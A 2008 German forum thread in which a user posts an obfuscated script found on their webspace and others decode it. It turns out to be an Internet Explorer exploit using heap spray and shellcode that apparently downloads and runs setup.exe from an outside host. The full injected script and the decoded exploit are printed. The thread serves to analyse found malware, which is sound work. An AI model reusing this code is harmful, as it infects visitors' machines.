#1 22. Dezember 2008 Hallo zusammen, die HTML-Datei war auf meinem Webspace. Allerdings kann ich nichts mit dem verschlüsselten Inhalt anfangen. Vielleicht ja jemand hier? Code: <SCRIPT Language="JavaScript"> eval(escape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<novj->%08<vrkpaq->%089gfmanoz\"?\"NOVJpgllk,ecv%089+ gacnrgp *fK{@vlgognGvge,vlgowamf\"?\"ecv%089 <LCRQ-><LCRQ-><NOVJ?QCVCOPMDCVCF\"A?FNDCVCF\"K!?APQCVCF\"LCRQ><NOZ-><K?FK\"NOZ><NOVJ?QCVCOPMDCVCF\"A?FNDCVCF\"K!?APQCVCF\"LCRQ><NOZ-><Z-><A-><__<gf,gpwvwdgnwog,9c2c2z!$9c2c2z!$--8rvvj?APQ\"gecok>YCVCFAY#><A><Z><K?FK\"NOZ> \"?\"gfmanoz%089gfmanngjq\")\"{cprq\"?\"_kY{pmogo%08+))k\"9223\">\"k\"92\"?\"k*pmd%089+*{cppC\"ugl\"?\"{pmogo%089+2222fz2\">\"jvelgn,{cprq*gnkju\"%089{cprq\"?)\"{cprq%08y\"mf%089+ c2c2w'c2c2w' *grcaqglw\"?\"{cprq\"pct%089+ 7422w'74:5w'25g0w'6575w'1574w'15d0w'3464w'a4d4w'55g4w'64d4w'f4d0w'0575w'44d4w'74d0w'g064w'0574w'6575w'4475w'a474w'f475w'd074w'c1d0w'6525w':465w'ddddw';:ddw'22:gw'a7g4w'g0g0w'ddddw'5`ddw'22:gw'a7g4w'g0g0w'ddddw'2cddw'22:gw'7436w';4a4w'd446w'6467w'd434w'g4a4w'd455w'a666w'7707w'ddddw'gcddw'22:gw'a4a4w'g064w'd4g4w'a4f4w'7505w'ddddw'`cddw'2f:gw'22ddw'4fc4w'15ddw':f0gw':4g5w'2f17w'37ddw'c422w'66;7w'4f`gw'g2ddw'gdc:w':4:;w'2f17w'07ddw'4fc7w'f6ddw'7f;aw':42cw'2f17w'22ddw'07c4w'2237w'22c4w';7c4w'`g`7w'05c7w'2f`gw'07ddw';737w'`gf6w'4fc7w'a5ddw'adf2w':4ccw'0717w'0a07w'2f;:w'07ddw'27c7w'4f`gw'agddw'g6g2w':4g:w'5a17w'4f;:w'agddw'g6g2w':4g:w':217w'`:`7w'`:`3w'`7a3w'a2`:w'`:`7w'`:;3w';764w'c421w'22g7w'0a:2w'f7`7w'd7g7w'312aw'`g02w'32:gw'62`:w'`g`:w'a332w'`:c7w'a2`6w'44`:w'32`gw'c760w'3g`:w'6375w'a560w'0d`1w'5a`gw'f232w'3adaw'6552w':12gw'2aacw'ad31w'31ddw'32ggw'61`:w';6`:w'1g01w'32`gw'c720w':3`:w'`:c6w'32cgw'72:5w'`:67w'76a1w':3`:w'a460w'57`:w'7747w'2217w'2222w':g47w' *grcaqglw\"?\"gfmanngjq\"pct%08<vrkpaq>%08<tkf->z< gacnrgp ?fk\"tkf>%08<novj>")); </SCRIPT> + Multi-Zitat Zitieren
#2 22. Dezember 2008 AW: HTML-Datei auf Webspace hm also der hex-code am anfang konnte decryptet werden, der rest nicht... Code: <SCRIPT Language="JavaScript"> eval(escape("function d(s){r=new Array();t="";j=0;for(i=s.length-1;i>0;i--){t+=String.fromCharCode(s.charCodeAt(i)^2);if(t.length>80){r[j++]=t;t=""}}document.write(r.join("")+t)}"));d + Multi-Zitat Zitieren
#3 22. Dezember 2008 AW: HTML-Datei auf Webspace Hi, danke erstmal. Hast du ne Ahnung was das zu bedeuten haben könnte? + Multi-Zitat Zitieren
#4 22. Dezember 2008 AW: HTML-Datei auf Webspace das entschlüsselt das gedöns nachm escapen is im prinzip ne nochmalige verschlüsselung, weil escapen kann eigentlich jeder. bin aber grad zu faul das durchlaufen zu lassen. lasses dir halt printen + Multi-Zitat Zitieren
#5 23. Dezember 2008 AW: HTML-Datei auf Webspace Entschlüsselt: Code: <html> <div id="replace">x</div> <script> var shellcode = unescape("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u6e5c%ue800%uffb7%uffff%u2e2e%u6e5c%ue800%uff89%uffff%u7468%u7074%u2f3a%u652f%u756d%u656c%u7566%u7574%u6572%u642e%u2f65%u6f66%u7572%u2f6d%u6f64%u6e77%u6f6c%u6461%u2f73%u6573%u7574%u2e70%u7865%u0065"); var spray = unescape("%u0a0a%u0a0a"); do { spray += spray; } while(spray.length < 0xd0000); memory = new Array(); for(i = 0; i < 100; i++) memory[i] = spray + shellcode; xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.emulefuture.de>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>"; tag = document.getElementById("replace"); tag.innerHTML = xmlcode; </script> </html> Es ist, wie man an "Shellcode" leicht erkennen kann, ein Exploit: http://www.milw0rm.com/exploits/7477 Microsoft Internet Explorer Exploit Man kann leider nicht so leicht rausfinden was dieser Shellcode bewirkt, was gutes aber auf keinen fall + Multi-Zitat Zitieren